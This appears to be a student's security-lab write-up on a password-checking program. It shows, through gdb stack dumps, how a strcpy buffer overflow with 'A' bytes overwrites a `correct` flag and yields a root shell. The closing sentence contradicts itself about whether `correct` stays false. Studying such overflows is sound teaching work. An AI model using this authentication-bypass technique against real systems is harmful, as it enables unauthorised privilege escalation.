a If there is no cli argument, the program aborts. Otherwise, checkpass() is called with the argument. The crypt library is used to compute a hash of the argument with some salt. According to http://www.gnu.org/software/libc/manual/html_node/crypt.html, the best way to recover the password is to launch a brute force attack. b Before strcpy, the stack is 'normal': ... (gdb) ni 0x0000000000400840 14 strcpy(password,input); ... => 0x0000000000400840 : e8 2b fe ff ff call 0x400670 (gdb) x /64bx $rsp 0x7ffe8a0fdd60: 0x78 0x5d 0x3b 0xaf 0x29 0x7f 0x00 0x00 0x7ffe8a0fdd68: 0x53 0xf4 0x0f 0x8a 0xfe 0x7f 0x00 0x00 0x7ffe8a0fdd70: 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x7ffe8a0fdd78: 0x30 0x08 0x00 0x00 0x01 0x00 0x00 0x00 0x7ffe8a0fdd80: 0xb0 0xde 0x0f 0x8a 0xfe 0x7f 0x00 0x00 0x7ffe8a0fdd88: 0x38 0x4f 0xba 0xaf 0x29 0x7f 0x00 0x00 0x7ffe8a0fdd90: 0xe0 0xde 0x0f 0x8a 0xfe 0x7f 0x00 0x00 0x7ffe8a0fdd98: 0x00 0x75 0xba 0xaf 0x29 0x7f 0x00 0x00 But, because we're copying more characters than `password` can hold, after strcpy, the stack is corrupted: (gdb) ni ... (gdb) x /64bx $rsp 0x7ffe8a0fdd60: 0x78 0x5d 0x3b 0xaf 0x29 0x7f 0x00 0x00 0x7ffe8a0fdd68: 0x53 0xf4 0x0f 0x8a 0xfe 0x7f 0x00 0x00 0x7ffe8a0fdd70: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7ffe8a0fdd78: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7ffe8a0fdd80: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7ffe8a0fdd88: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7ffe8a0fdd90: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7ffe8a0fdd98: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 In particular, the value of `correct` is now 0x41: (gdb) x &correct 0x7ffe8a0fde8f: 0x41 which is truthy. The hash is computed normally, the strcmp call evaluates to non-zero, so the string `ERROR: password incorrect` is printed, however, correct stays false. Because of this, a root shell is started.